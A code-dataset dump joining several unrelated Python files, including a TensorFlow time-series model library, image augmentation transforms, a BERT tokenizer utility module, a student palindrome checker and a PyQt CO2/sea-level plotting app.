- xs: list of observations: nsamp x [ragged] x n
- ell: order of the LEG model to fit
- [optional] N,R,B,Lambda -- initial conditions
- [optional] maxiter -- max number of iters to use in BFGS
- [optional] use_tqdm_notebook -- whether to make an update bar with tqdm
Output: dictionary with lots of keys. See supplementary.pdf for details. Important keys are:
- message (result of optimization)
- params (a dictionary with keys for each parameter of a LEG model)
- nats (the negative log likelihood divided by the number of observations)
'''
    mf = LEGFamily(ell, xs[0].shape[1])
    p_init = mf.get_initial_guess(ts, xs, N=N, R=R, B=B, Lambda=Lambda)
    return fit_model_family(ts, xs, mf, p_init, maxiter=maxiter, use_tqdm_notebook=use_tqdm_notebook)
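# A minimal usage sketch (hypothetical data; names follow the API defined above):
#
#   import numpy as np, numpy.random as npr
#   ts = [np.sort(npr.rand(200) * 10.0)]   # one ragged vector of timestamps
#   xs = [npr.randn(200, 2)]               # matching observations with n = 2 channels
#   result = fit(ts, xs, ell=3, maxiter=50)
#   print(result['message'], result['nats'][-1])   # optimizer status, final nats per observation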
r'''
_ _ __ _ _ _
_ __ ___ ___ __| | ___| | / _| __ _ _ __ ___ (_) (_) ___ ___
| '_ ` _ \ / _ \ / _` |/ _ \ | | |_ / _` | '_ ` _ \| | | |/ _ \/ __|
| | | | | | (_) | (_| | __/ | | _| (_| | | | | | | | | | __/\__ \
|_| |_| |_|\___/ \__,_|\___|_| |_| \__,_|_| |_| |_|_|_|_|\___||___/
'''
class LEGFamily:
def __init__(self,ell,n):
self.ell=ell
self.n=n
msk=np.tril(np.ones((self.ell,self.ell)))
self.N_idxs = tf.convert_to_tensor(np.c_[np.where(msk)])
msk=np.tril(np.ones((self.ell,self.ell)),k=-1)
self.R_idxs = tf.convert_to_tensor(np.c_[np.where(msk)])
msk=np.tril(np.ones((self.n,self.n)))
self.Lambda_idxs = tf.convert_to_tensor(np.c_[np.where(msk)])
self.psize = self.N_idxs.shape[0]+self.R_idxs.shape[0]+self.ell*self.n+self.Lambda_idxs.shape[0]
def p2NRBL(self,p):
i=0
# N!
sz=self.N_idxs.shape[0]
N=tf.scatter_nd(self.N_idxs,p[i:i+sz],(self.ell,self.ell))
i+=sz
# R!
sz=self.R_idxs.shape[0]
R=tf.scatter_nd(self.R_idxs,p[i:i+sz],(self.ell,self.ell))
i+=sz
# B!
sz=self.ell*self.n; B = tf.reshape(p[i:i+sz],(self.n,self.ell)); i+=sz
# Lambda!
sz=self.Lambda_idxs.shape[0]
Lambda=tf.scatter_nd(self.Lambda_idxs,p[i:i+sz],(self.n,self.n))
i+=sz
return N,R,B,Lambda
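    # Packing layout of p (the inverse of get_initial_guess below): the lower-triangular
    # entries of N, the strictly-lower entries of R, the flattened n x ell matrix B,
    # then the lower-triangular entries of Lambda, concatenated in that order.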
@tf.function(autograph=False)
def informant(self,ts,x,idxs,p):
'''
gradient of log likelihood w.r.t. p
'''
with tf.GradientTape() as g:
g.watch(p)
N,R,B,Lambda = self.p2NRBL(p)
nats = legops.leg_log_likelihood_tensorflow(ts,x,idxs,N,R,B,Lambda)
return g.gradient(nats,p)
@tf.function(autograph=False)
def log_likelihood(self,ts,x,idxs,p):
'''
log likelihood
'''
N,R,B,Lambda = self.p2NRBL(p)
return legops.leg_log_likelihood_tensorflow(ts,x,idxs,N,R,B,Lambda)
def get_initial_guess(self,ts,xs,N=None,R=None,B=None,Lambda=None):
# make up values when nothing is provided
if N is None:
N=np.eye(self.ell)
if R is None:
R=npr.randn(self.ell,self.ell)*.2
R=.5*(R-R.T)
if B is None:
B=np.ones((self.n,self.ell))
B=.5*B/np.sqrt(np.sum(B**2,axis=1,keepdims=True))
if Lambda is None:
Lambda = .1*np.eye(self.n)
# make 'em nice for us
N = tf.linalg.cholesky(N@tf.transpose(N))
R = (R-tf.transpose(R))
Lambda = tf.linalg.cholesky(Lambda@tf.transpose(Lambda))
# put it all together
pN=tf.gather_nd(N,self.N_idxs)
pR=tf.gather_nd(R,self.R_idxs)
pB=tf.reshape(B,(self.n*self.ell,))
pL=tf.gather_nd(Lambda,self.Lambda_idxs)
return tf.concat([pN,pR,pB,pL],axis=0)
class CeleriteFamily(LEGFamily):
def __init__(self,nblocks,n):
self.nblocks=nblocks
self.ell=nblocks*2
self.n=n
        msk = np.eye(self.ell, dtype=bool) + np.diag(np.tile([True, False], self.nblocks)[:-1], -1)
self.N_idxs = tf.convert_to_tensor(np.c_[np.where(msk)])
msk = np.diag(np.tile([True,False],self.nblocks)[:-1],-1)
self.R_idxs = tf.convert_to_tensor(np.c_[np.where(msk)])
msk=np.tril(np.ones((self.n,self.n)))
self.Lambda_idxs = tf.convert_to_tensor(np.c_[np.where(msk)])
self.psize = self.N_idxs.shape[0]+self.R_idxs.shape[0]+self.ell*self.n+self.Lambda_idxs.shape[0]
def get_initial_guess(self,ts,xs):
N=np.eye(self.ell)
R=npr.randn(self.ell,self.ell)*.2
B=np.ones((self.n,self.ell))
B=.5*B/np.sqrt(np.sum(B**2,axis=1,keepdims=True))
Lambda = .1*np.eye(self.n)
N = tf.linalg.cholesky(N@tf.transpose(N))
R = (R-tf.transpose(R))
Lambda = tf.linalg.cholesky(Lambda@tf.transpose(Lambda))
# put it all together
pN=tf.gather_nd(N,self.N_idxs)
pR=tf.gather_nd(R,self.R_idxs)
pB=tf.reshape(B,(self.n*self.ell,))
pL=tf.gather_nd(Lambda,self.Lambda_idxs)
return tf.concat([pN,pR,pB,pL],axis=0) | 2.265625 | 2 |
aug.py | daaiwusheng/ferattention | 79 | 12770045 | import cv2
from torchvision import transforms
from pytvision.transforms import transforms as mtrans
# transformations
#normalize = mtrans.ToMeanNormalization(
# #mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225],
# mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5],
# )
# cifar10
# normalize = mtrans.ToMeanNormalization(
# mean = (0.4914, 0.4822, 0.4465), #[x / 255 for x in [125.3, 123.0, 113.9]],
# std = (0.2023, 0.1994, 0.2010), #[x / 255 for x in [63.0, 62.1, 66.7]],
# )
# cifar100
#normalize = mtrans.ToMeanNormalization(
# mean = [x / 255 for x in [129.3, 124.1, 112.4]],
# std = [x / 255 for x in [68.2, 65.4, 70.4]],
# )
# svhn
#normalize = mtrans.ToMeanNormalization(
# mean = [x / 255 for x in [127.5, 127.5, 127.5]],
# std = [x / 255 for x in [127.5, 127.5, 127.5]],
# )
# normalize = mtrans.ToMeanNormalization(
# mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5],
# )
normalize = mtrans.ToNormalization()
def get_transforms_aug( size_input ):
return transforms.Compose([
#------------------------------------------------------------------
#Resize input
mtrans.ToResize( (48,48 ), resize_mode='square', padding_mode=cv2.BORDER_REFLECT),
#------------------------------------------------------------------
#Colors
#mtrans.ToRandomTransform( mtrans.RandomBrightness( factor=0.25 ), prob=0.50 ),
#mtrans.ToRandomTransform( mtrans.RandomContrast( factor=0.25 ), prob=0.50 ),
#mtrans.ToRandomTransform( mtrans.RandomGamma( factor=0.25 ), prob=0.50 ),
#mtrans.ToRandomTransform( mtrans.RandomRGBPermutation(), prob=0.50 ),
mtrans.ToRandomTransform( mtrans.CLAHE(), prob=0.25 ),
mtrans.ToRandomTransform( mtrans.ToGaussianBlur( sigma=0.005 ), prob=0.25 ),
#------------------------------------------------------------------
#Resize
mtrans.ToResize( (size_input,size_input), resize_mode='square', padding_mode=cv2.BORDER_REFLECT),
#------------------------------------------------------------------
mtrans.ToGrayscale(),
mtrans.ToTensor(),
normalize,
])
def get_transforms_det(size_input):
return transforms.Compose([
mtrans.ToResize( (size_input, size_input), resize_mode='squash', padding_mode=cv2.BORDER_REFLECT ) ,
mtrans.ToGrayscale(),
mtrans.ToTensor(),
normalize,
])
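# Usage sketch (hypothetical wiring; the two pipelines defined above):
#   train_tf = get_transforms_aug(64)   # stochastic augmentation for training
#   valid_tf = get_transforms_det(64)   # deterministic resize/grayscale for evaluation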
| 2.1875 | 2 |
proj04/proj04.py | scienceman44/SAVY | 0 | 12770046 | # Name:
# Date:
"""
proj04
Asks the user for a string and prints out whether or not the string is a palindrome.
"""
loop_control = True
g = []
p = []
j = raw_input('I am the computer')
h = raw_input('I calculate palindromes')
k = raw_input('I know all')
while loop_control:
    # reset the letter lists each round so earlier words don't leak into the next check
    g = []
    p = []
    d = raw_input('type a word for me to calculate')
    v = raw_input('calculating ... 0%')
    v = raw_input('calculating ... 17%')
    v = raw_input('calculating ... 21%')
    v = raw_input('calculating ... 34%')
    v = raw_input('calculating ... 43%')
    v = raw_input('calculating ... 50%')
    v = raw_input('calculating ... 62%')
    v = raw_input('calculating ... 74%')
    v = raw_input('calculating ... 86%')
    v = raw_input('calculating ... 99%')
l = raw_input('Done!')
n = raw_input('Press ENTER for your result.')
for letter in d:
p.append(letter)
p.reverse()
for letter in d:
g.append(letter)
    if p == g:
        print d, 'is a palindrome'
    else:
        print d, 'is not a palindrome'
    a = raw_input('would you like me to calculate another word? (yes or no)')
if a == 'yes':
print 'ok!'
elif a == 'no':
print 'ok!'
loop_control = False | 4.1875 | 4 |
utils/data_util.py | yuejiaxiang/semEvel2020_task8 | 0 | 12770047 | import re
import unicodedata
import numpy as np
import torch
def get_ner_BIO(label_list):
    """Extract inclusive [start, end] index spans of B/I runs from a BIO label sequence."""
    list_len = len(label_list)
begin_label = 'B'
inside_label = 'I'
whole_tag = ''
index_tag = ''
tag_list = []
stand_matrix = []
for i in range(0, list_len):
# wordlabel = word_list[i]
current_label = label_list[i].upper()
if begin_label in current_label:
if index_tag == '':
# whole_tag = 'answer' + '[' + str(i)
whole_tag = '[' + str(i)
index_tag = 'answer'
# whole_tag = current_label.replace(begin_label,"",1) +'[' +str(i)
# index_tag = current_label.replace(begin_label,"",1)
else:
tag_list.append(whole_tag + ',' + str(i-1))
# whole_tag = 'answer' + '[' + str(i)
whole_tag = '[' + str(i)
index_tag = 'answer'
# whole_tag = current_label.replace(begin_label,"",1) + '[' + str(i)
# index_tag = current_label.replace(begin_label,"",1)
elif inside_label in current_label:
if 'answer' == index_tag:
whole_tag = whole_tag
else:
if (whole_tag != '')&(index_tag != ''):
tag_list.append(whole_tag + ',' + str(i-1))
whole_tag = ''
index_tag = ''
else:
if (whole_tag != '')&(index_tag != ''):
tag_list.append(whole_tag + ',' + str(i-1))
whole_tag = ''
index_tag = ''
# if (whole_tag != '')&(index_tag != ''):
# tag_list.append(whole_tag)
if whole_tag !='' and ',' not in whole_tag:
tag_list.append(whole_tag + ',' + str(list_len - 1))
tag_list_len = len(tag_list)
for i in range(0, tag_list_len):
if len(tag_list[i]) > 0:
tag_list[i] = tag_list[i] + ']'
insert_list = reverse_style(tag_list[i])
stand_matrix.append(eval(insert_list))
return stand_matrix
def reverse_style(input_string):
target_position = input_string.index('[')
input_len = len(input_string)
output_string = input_string[target_position:input_len] + input_string[0:target_position]
return output_string
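# Worked example for get_ner_BIO (mirrors the __main__ check at the bottom of this file):
#   get_ner_BIO(['O', 'B', 'I', 'I', 'O', 'O', 'O', 'B', 'I']) -> [[1, 3], [7, 8]]
# i.e. the inclusive [start, end] indices of each B/I run.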
def is_string(s):
"""判断是否是字符串
"""
return isinstance(s, str)
def padding(seqs, is_float=False, batch_first=False):
lengths = [len(s) for s in seqs]
seqs = [torch.Tensor(s) for s in seqs]
batch_length = max(lengths)
seq_tensor = torch.FloatTensor(batch_length, len(seqs)).fill_(float(0)) if is_float \
else torch.LongTensor(batch_length, len(seqs)).fill_(0)
for i, s in enumerate(seqs):
end_seq = lengths[i]
seq_tensor[:end_seq, i].copy_(s[:end_seq])
if batch_first:
seq_tensor = seq_tensor.t()
return seq_tensor, lengths
def mpn_padding(seqs, label, class_num, is_float=False, use_bert=False):
lengths = [len(s) for s in seqs]
seqs = [torch.Tensor(s) for s in seqs]
batch_length = max(lengths)
o1_tensor = torch.FloatTensor(len(seqs), batch_length, class_num).fill_(float(0)) if is_float \
else torch.LongTensor(len(seqs), batch_length, class_num).fill_(0)
o2_tensor = torch.FloatTensor(len(seqs), batch_length, class_num).fill_(float(0)) if is_float \
else torch.LongTensor(len(seqs), batch_length, class_num).fill_(0)
for i, label_ in enumerate(label):
for attr in label_:
if use_bert:
o1_tensor[i, attr.value_pos_start + 1, attr.attr_type_id] = 1
o2_tensor[i, attr.value_pos_end, attr.attr_type_id] = 1
else:
o1_tensor[i, attr.value_pos_start, attr.attr_type_id] = 1
o2_tensor[i, attr.value_pos_end - 1, attr.attr_type_id] = 1
return o1_tensor, o2_tensor
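# mpn_padding builds two (batch, max_len, class_num) tensors that mark attribute-value
# start and end positions (presumably the 'mpn' multi-pointer-network training targets).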
def spo_padding(seqs, label, class_num, is_float=False, use_bert=False):
lengths = [len(s) for s in seqs]
seqs = [torch.Tensor(s) for s in seqs]
batch_length = max(lengths)
o1_tensor = torch.FloatTensor(len(seqs), batch_length, class_num).fill_(float(0)) if is_float \
else torch.LongTensor(len(seqs), batch_length, class_num).fill_(0)
o2_tensor = torch.FloatTensor(len(seqs), batch_length, class_num).fill_(float(0)) if is_float \
else torch.LongTensor(len(seqs), batch_length, class_num).fill_(0)
for i, label_ in enumerate(label):
for po in label_:
if use_bert:
o1_tensor[i, po.object_start + 1, po.predict_type_id] = 1
o2_tensor[i, po.object_end, po.predict_type_id] = 1
else:
o1_tensor[i, po.object_start, po.predict_type_id] = 1
o2_tensor[i, po.object_end - 1, po.predict_type_id] = 1
return o1_tensor, o2_tensor
def _handle_pos_limit(pos, limit=30):
for i, p in enumerate(pos):
if p > limit:
pos[i] = limit
if p < -limit:
pos[i] = -limit
return [p + limit + 1 for p in pos]
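# Example: _handle_pos_limit([-40, -3, 0, 35], limit=30) -> [1, 28, 31, 61]
# (positions are clipped to [-30, 30], then shifted by limit + 1 to non-negative ids).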
def find_position(entity_name, text):
start = text.find(entity_name, 0)
return start, start + len(entity_name)
class BasicTokenizer(object):
"""分词器基类
"""
def __init__(self, do_lower_case=False):
"""初始化
"""
self._token_pad = '[PAD]'
self._token_cls = '[CLS]'
self._token_sep = '[SEP]'
self._token_unk = '[UNK]'
self._token_mask = '[MASK]'
self._do_lower_case = do_lower_case
def tokenize(self, text, add_cls=True, add_sep=True, max_length=None):
"""分词函数
"""
if self._do_lower_case:
text = unicodedata.normalize('NFD', text)
text = ''.join(
[ch for ch in text if unicodedata.category(ch) != 'Mn'])
text = text.lower()
tokens = self._tokenize(text)
if add_cls:
tokens.insert(0, self._token_cls)
if add_sep:
tokens.append(self._token_sep)
if max_length is not None:
self.truncate_sequence(max_length, tokens, None, -2)
return tokens
def token_to_id(self, token):
"""token转换为对应的id
"""
raise NotImplementedError
def tokens_to_ids(self, tokens):
"""token序列转换为对应的id序列
"""
return [self.token_to_id(token) for token in tokens]
def truncate_sequence(self,
max_length,
first_sequence,
second_sequence=None,
pop_index=-1):
"""截断总长度
"""
if second_sequence is None:
second_sequence = []
while True:
total_length = len(first_sequence) + len(second_sequence)
if total_length <= max_length:
break
elif len(first_sequence) > len(second_sequence):
first_sequence.pop(pop_index)
else:
second_sequence.pop(pop_index)
def encode(self,
first_text,
second_text=None,
max_length=None,
first_length=None,
second_length=None):
"""输出文本对应token id和segment id
如果传入first_length,则强行padding第一个句子到指定长度;
同理,如果传入second_length,则强行padding第二个句子到指定长度。
"""
if is_string(first_text):
first_tokens = self.tokenize(first_text)
else:
first_tokens = first_text
if second_text is None:
second_tokens = None
elif is_string(second_text):
second_tokens = self.tokenize(second_text, add_cls=False)
else:
second_tokens = second_text
if max_length is not None:
self.truncate_sequence(max_length, first_tokens, second_tokens, -2)
first_token_ids = self.tokens_to_ids(first_tokens)
if first_length is not None:
first_token_ids = first_token_ids[:first_length]
first_token_ids.extend([self._token_pad_id] *
(first_length - len(first_token_ids)))
first_segment_ids = [0] * len(first_token_ids)
if second_text is not None:
second_token_ids = self.tokens_to_ids(second_tokens)
if second_length is not None:
second_token_ids = second_token_ids[:second_length]
second_token_ids.extend(
[self._token_pad_id] *
(second_length - len(second_token_ids)))
second_segment_ids = [1] * len(second_token_ids)
first_token_ids.extend(second_token_ids)
first_segment_ids.extend(second_segment_ids)
return first_token_ids, first_segment_ids
def id_to_token(self, i):
"""id序列为对应的token
"""
raise NotImplementedError
def ids_to_tokens(self, ids):
"""id序列转换为对应的token序列
"""
return [self.id_to_token(i) for i in ids]
def decode(self, ids):
"""转为可读文本
"""
raise NotImplementedError
def _tokenize(self, text):
"""基本分词函数
"""
raise NotImplementedError
class Tokenizer(BasicTokenizer):
"""Bert原生分词器
纯Python实现,代码修改自keras_bert的tokenizer实现
"""
def __init__(self, token_dict, do_lower_case=False):
"""初始化
"""
super(Tokenizer, self).__init__(do_lower_case)
if is_string(token_dict):
token_dict = load_vocab(token_dict)
self._token_dict = token_dict
self._token_dict_inv = {v: k for k, v in token_dict.items()}
for token in ['pad', 'cls', 'sep', 'unk', 'mask']:
try:
_token_id = token_dict[getattr(self, '_token_%s' % token)]
setattr(self, '_token_%s_id' % token, _token_id)
except:
pass
self._vocab_size = len(token_dict)
def token_to_id(self, token):
"""token转换为对应的id
"""
return self._token_dict.get(token, self._token_unk_id)
def id_to_token(self, i):
"""id转换为对应的token
"""
return self._token_dict_inv[i]
def decode(self, ids, tokens=None):
"""转为可读文本
"""
tokens = tokens or self.ids_to_tokens(ids)
tokens = [token for token in tokens if not self._is_special(token)]
text, flag = '', False
for i, token in enumerate(tokens):
if token[:2] == '##':
text += token[2:]
elif len(token) == 1 and self._is_cjk_character(token):
text += token
elif len(token) == 1 and self._is_punctuation(token):
text += token
text += ' '
elif i > 0 and self._is_cjk_character(text[-1]):
text += token
else:
text += ' '
text += token
text = re.sub(' +', ' ', text)
text = re.sub('\' (re|m|s|t|ve|d|ll) ', '\'\\1 ', text)
punctuation = self._cjk_punctuation() + '+-/={(<['
punctuation_regex = '|'.join([re.escape(p) for p in punctuation])
punctuation_regex = '(%s) ' % punctuation_regex
text = re.sub(punctuation_regex, '\\1', text)
text = re.sub('(\d\.) (\d)', '\\1\\2', text)
return text.strip()
def _tokenize(self, text):
"""基本分词函数
"""
spaced = ''
for ch in text:
if self._is_punctuation(ch) or self._is_cjk_character(ch):
spaced += ' ' + ch + ' '
elif self._is_space(ch):
spaced += ' '
elif ord(ch) == 0 or ord(ch) == 0xfffd or self._is_control(ch):
continue
else:
spaced += ch
tokens = []
for word in spaced.strip().split():
tokens.extend(self._word_piece_tokenize(word))
return tokens
def _word_piece_tokenize(self, word):
"""word内分成subword
"""
if word in self._token_dict:
return [word]
tokens = []
start, stop = 0, 0
while start < len(word):
stop = len(word)
while stop > start:
sub = word[start:stop]
if start > 0:
sub = '##' + sub
if sub in self._token_dict:
break
stop -= 1
if start == stop:
stop += 1
tokens.append(sub)
start = stop
return tokens
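    # Example (hypothetical vocab): with 'un', '##aff' and '##able' present,
    # _word_piece_tokenize('unaffable') -> ['un', '##aff', '##able']; characters
    # that match nothing fall through one at a time (see the start == stop branch).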
@staticmethod
def _is_space(ch):
"""空格类字符判断
"""
return ch == ' ' or ch == '\n' or ch == '\r' or ch == '\t' or \
unicodedata.category(ch) == 'Zs'
@staticmethod
def _is_punctuation(ch):
"""标点符号类字符判断(全/半角均在此内)
"""
code = ord(ch)
return 33 <= code <= 47 or \
58 <= code <= 64 or \
91 <= code <= 96 or \
123 <= code <= 126 or \
unicodedata.category(ch).startswith('P')
@staticmethod
def _cjk_punctuation():
return u'\uff02\uff03\uff04\uff05\uff06\uff07\uff08\uff09\uff0a\uff0b\uff0c\uff0d\uff0f\uff1a\uff1b\uff1c\uff1d\uff1e\uff20\uff3b\uff3c\uff3d\uff3e\uff3f\uff40\uff5b\uff5c\uff5d\uff5e\uff5f\uff60\uff62\uff63\uff64\u3000\u3001\u3003\u3008\u3009\u300a\u300b\u300c\u300d\u300e\u300f\u3010\u3011\u3014\u3015\u3016\u3017\u3018\u3019\u301a\u301b\u301c\u301d\u301e\u301f\u3030\u303e\u303f\u2013\u2014\u2018\u2019\u201b\u201c\u201d\u201e\u201f\u2026\u2027\ufe4f\ufe51\ufe54\xb7\uff01\uff1f\uff61\u3002'
@staticmethod
def _is_cjk_character(ch):
"""CJK类字符判断(包括中文字符也在此列)
参考:https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)
"""
code = ord(ch)
return 0x4E00 <= code <= 0x9FFF or \
0x3400 <= code <= 0x4DBF or \
0x20000 <= code <= 0x2A6DF or \
0x2A700 <= code <= 0x2B73F or \
0x2B740 <= code <= 0x2B81F or \
0x2B820 <= code <= 0x2CEAF or \
0xF900 <= code <= 0xFAFF or \
0x2F800 <= code <= 0x2FA1F
@staticmethod
def _is_control(ch):
"""控制类字符判断
"""
return unicodedata.category(ch) in ('Cc', 'Cf')
@staticmethod
def _is_special(ch):
"""判断是不是有特殊含义的符号
"""
return bool(ch) and (ch[0] == '[') and (ch[-1] == ']')
def load_vocab(dict_path, encoding='utf-8', simplified=False, startwith=None):
"""从bert的词典文件中读取词典
"""
token_dict = {}
with open(dict_path, encoding=encoding) as reader:
for line in reader:
token = line.strip()
token_dict[token] = len(token_dict)
    if simplified:  # filter out redundant tokens
new_token_dict, keep_tokens = {}, []
startwith = startwith or []
for t in startwith:
new_token_dict[t] = len(new_token_dict)
keep_tokens.append(token_dict[t])
for t, _ in sorted(token_dict.items(), key=lambda s: s[1]):
if t not in new_token_dict:
keep = True
if len(t) > 1:
for c in (t[2:] if t[:2] == '##' else t):
if (Tokenizer._is_cjk_character(c)
or Tokenizer._is_punctuation(c)):
keep = False
break
if keep:
new_token_dict[t] = len(new_token_dict)
keep_tokens.append(token_dict[t])
return new_token_dict, keep_tokens
else:
return token_dict
def search(pattern, sequence):
"""从sequence中寻找子串pattern
如果找到,返回第一个下标;否则返回-1。
"""
n = len(pattern)
for i in range(len(sequence)):
if sequence[i:i + n] == pattern:
return i
return -1
def sequence_padding(inputs, length=None, padding=0, is_float=False):
"""Numpy函数,将序列padding到同一长度
"""
if length is None:
length = max([len(x) for x in inputs])
outputs = np.array([
np.concatenate([x, [padding] * (length - len(x))])
if len(x) < length else x[:length] for x in inputs
])
    out_tensor = torch.FloatTensor(outputs) if is_float \
        else torch.LongTensor(outputs)
    return out_tensor  # already a tensor; re-wrapping with torch.tensor would just copy it
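# Example: sequence_padding([[1, 2, 3], [4]]) -> LongTensor([[1, 2, 3], [4, 0, 0]])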
def batch_gather(data: torch.Tensor, index: torch.Tensor):
length = index.shape[0]
t_index = index.cpu().numpy()
t_data = data.cpu().data.numpy()
result = []
for i in range(length):
result.append(t_data[i, t_index[i], :])
return torch.from_numpy(np.array(result)).to(data.device)
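# Shape note: for data of shape (B, L, H) and index of shape (B, K), batch_gather
# returns (B, K, H): row i gathers data[i, index[i], :] via a NumPy round-trip.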
def select_padding(seqs, select, is_float=False, class_num=None):
lengths = [len(s) for s in seqs]
batch_length = max(lengths)
seq_tensor = torch.FloatTensor(len(seqs), batch_length, class_num, batch_length).fill_(float(0)) if is_float \
else torch.LongTensor(len(seqs), batch_length, class_num, batch_length).fill_(0)
# NA = BAIDU_SELECT['NA']
# seq_tensor[:, :, NA, :] = 1
for i, triplet_list in enumerate(select):
for triplet in triplet_list:
subject_pos = triplet[0]
object_pos = triplet[1]
predicate = triplet[2]
seq_tensor[i, subject_pos, predicate, object_pos] = 1
# seq_tensor[i, subject_pos, NA, object_pos] = 0
return seq_tensor
if __name__=='__main__':
a = ['O', 'B', 'I', 'I', 'O', 'O', 'O', 'B', 'I']
print(get_ner_BIO(a)) | 2.5 | 2 |
bookstore/src/cart/dummy.py | mehulk99/Online-Book-Store | 1 | 12770048 | class SomeSingleton(object):
__instance__ = None
def __new__(cls, *args,**kwargs):
if SomeSingleton.__instance__ is None:
SomeSingleton.__instance__ = object.__new__(cls)
return SomeSingleton.__instance__
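    # Note: __init__ still runs on every SomeSingleton(...) call, so f and y are
    # overwritten each time; a known caveat of __new__-based singletons.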
    def __init__(self, f=0, y=0):
        self.f = f
        self.y = y
def some_func(self,arg):
pass
if __name__ == "__main__":
    s = SomeSingleton("343", "43443")
| 3.265625 | 3 |
zeus/urls.py | flyliufu/PythonDemo | 0 | 12770049 | from django.urls import path
from . import views
app_name = 'zeus'
urlpatterns = [
path('token', views.token, name='token'),
]
| 1.5625 | 2 |
Mac/graph1.py | Vishu26/Hydrological-Cycle | 0 | 12770050 | from grap import Ui_Form
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from sys import argv
from PyQt5.QtWidgets import *
import matplotlib as mpl
mpl.use('Qt5Agg')
import matplotlib.pyplot as plt
import numpy as np
class mas(QWidget, Ui_Form):
def __init__(self):
super(mas, self).__init__()
self.setupUi(self)
self.step = 2
self.seax = [1990]
self.seay = [-20]
self.cy = [278]
self.conc = 278
self.ppm.valueChanged.connect(self.se)
self.forward.clicked.connect(self.go)
self.time.currentIndexChanged.connect(self.t)
self.reset.clicked.connect(self.re)
self.expo.clicked.connect(self.exp)
fig, self.ax1 = plt.subplots()
self.ax1.plot(self.seax, self.seay, '*', color='r')
self.ax1.axis([1980, 2110, -30, 100])
self.ax1.xaxis.grid()
self.ax1.yaxis.grid()
self.ax1.set_facecolor('gray')
self.ax1.set_ylabel('Relative Sea Level (mm)')
self.ax1.yaxis.label.set_color('red')
self.ax1.tick_params(axis='y', colors='red')
self.ax2 = self.ax1.twinx()
self.ax2.plot(self.seax, self.cy, '^', color='b')
self.ax2.axis([1980, 2110, 268, 1200])
self.ax2.xaxis.grid()
self.ax2.set_ylabel('Concentration of Carbon Dioxide (PPM)')
self.ax2.yaxis.label.set_color('blue')
self.ax2.tick_params(axis='y', colors='blue')
self.ax1.set_xlabel('Date (Year)')
plt.savefig('fig.png')
self.graph.setPixmap(QPixmap('fig.png'))
self.show()
def exp(self):
with open('graph.txt', 'w') as f:
f.write('Date, CO2, Sea Level\n')
for i in range(len(self.cy)):
f.write(str(self.seax[i])+', '+str(self.cy[i])+', '+str(self.seay[i])+'\n')
def t(self):
self.step = int(self.time.currentText().split()[0])
def re(self):
self.hide()
self.__init__()
def se(self):
self.conc = self.ppm.value()
self.val.setText(str(self.conc)+' ppm')
    def go(self):
        new_year = self.seax[-1] + self.step
        if new_year > 2110:
            # check before appending so cy, seax and seay always stay the same length
            self.forward.setDisabled(True)
            return
        self.cy.append(self.conc)
        self.seax.append(new_year)
        # log CO2 forcing relative to the 278 ppm pre-industrial baseline
        x = np.log(self.conc / 278)
if x < 0.4:
self.seay.append(85 * x - 20)
elif x >= 0.4 and x <= 0.9:
self.seay.append(14)
else:
self.seay.append(400 * (x ** 2) - 800 * x + 414)
self.ax1.plot(self.seax, self.seay, '*', color='r')
self.ax2.plot(self.seax, self.cy, '^', color='b')
plt.savefig('fig.png')
self.graph.setPixmap(QPixmap('fig.png'))
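    # Quick check of the piecewise sea-level model in go(): at C = 278 ppm, x = 0 and the
    # level is 85*0 - 20 = -20 mm (the initial value of seay); for 0.4 <= x <= 0.9 the
    # curve plateaus at 14 mm; beyond x = 0.9 it grows quadratically.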
if __name__ == '__main__':
app = QApplication(argv)
m = mas()
app.exec_() | 2.453125 | 2 |